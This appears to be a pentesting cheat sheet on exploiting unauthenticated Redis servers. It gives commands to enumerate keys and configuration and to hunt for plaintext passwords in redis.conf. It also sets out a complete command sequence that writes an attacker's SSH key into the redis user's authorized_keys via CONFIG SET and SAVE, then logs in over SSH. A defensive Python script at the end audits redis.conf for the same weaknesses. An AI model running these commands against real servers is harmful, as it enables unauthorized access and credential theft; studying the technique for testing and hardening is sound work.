Theory
Remote Connection
By default, this protocol does not require authentication, which means that any actor can connect to the server remotely without providing valid credentials
Redis-cli
Setup
apt install -y -- redis-tools
Usage
redis-cli -h '<TARGET>'
Enumeration
General Information
INFO
CONFIG GET *
Keyspaces (Databases)
They can be listed with the INFO command and their data extracted as follows →
SELECT <KEYSPACE_INDEX> # e.g. SELECT 0
KEYS * # List all KEYS within the KEYSPACE
GET '<KEY>' # Obtain the data from a KEY
Sensitive Information
Even though we mentioned that redis does not require credentials by default, it can be configured to require them via the redis.conf file
The location of this configuration file can be enumerated as follows
redis-cli -h '<HOST>'
> INFO
Therefore, once we gain access to the system or are able to list the content of specific system files, we should look for plaintext passwords within the configuration file
A user or set of users can be found as well in this file
Note that when redis authentication is set to only password, the username is “default”
SSH
An operator might be able to write files within the home directory of the redis user, which can be extracted from the output of the CONFIG GET * command
Usually one of these is its home directory
/var/lib/redis
/home/redis/.ssh
If an adversary knows the path, he can set the working directory to the .ssh directory and write an authorized_keys file containing a public key that he created previously
Then, he could authenticate via SSH as the redis user by providing the private key
To do so, proceed as follows
Generating an SSH Public-Private Key pair
ssh-keygen -t rsa -b 4096 -f redis
Writing the Public Key to a file
printf "\n\n%s\n\n" "$( cat redis.pub )" > foo.txt
Importing the file into Redis
cat foo.txt | redis-cli -h '<TARGET>' -x set ssh_key # KEY Creation
Saving the Public Key as Authorized_keys
redis-cli -h '<TARGET>' config set dir /var/lib/redis/.ssh # Or /home/redis/.ssh
redis-cli -h '<TARGET>' config set dbfilename "authorized_keys"
redis-cli -h '<TARGET>' save
Pub Key Authentication as Redis user via SSH
ssh -p <PORT> -i redis redis@<TARGET>
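From the defender's side, the two conditions this page relies on (no authentication by default, and CONFIG SET being able to repoint dir and dbfilename) can be checked in redis.conf. The following Python audit is an added example, not part of the original notes; the sample configurations and the finding names are constructed for illustration.

```python
import shlex

# Constructed sample configurations (not taken from the page).
EXPOSED_CONF = """\
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command CONFIG ""
"""

def parse_conf(text):
    """Return {directive: [argument lists]}; directive names are lower-cased."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted values such as ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """Return a sorted list of finding names (hypothetical labels) for one redis.conf."""
    conf = parse_conf(text)
    findings = set()
    # No password, ACL user or ACL file: clients are accepted without credentials.
    if not any(k in conf for k in ("requirepass", "user", "aclfile")):
        findings.add("no-authentication")
    # protected-mode defaults to yes; only an explicit "no" turns it off.
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.add("protected-mode-off")
    # A missing bind line or a wildcard address listens on every interface.
    binds = [a.lstrip("-") for args in conf.get("bind", [["*"]]) for a in args]
    if any(a in ("*", "0.0.0.0", "::", "::*") for a in binds):
        findings.add("listens-on-all-interfaces")
    # CONFIG under its own name lets a client change dir/dbfilename at runtime.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.add("config-command-available")
    return sorted(findings)
```

A `user` line alone does not prove authentication is enforced (a `nopass` user still accepts any client), so a clean result is a starting point rather than a guarantee.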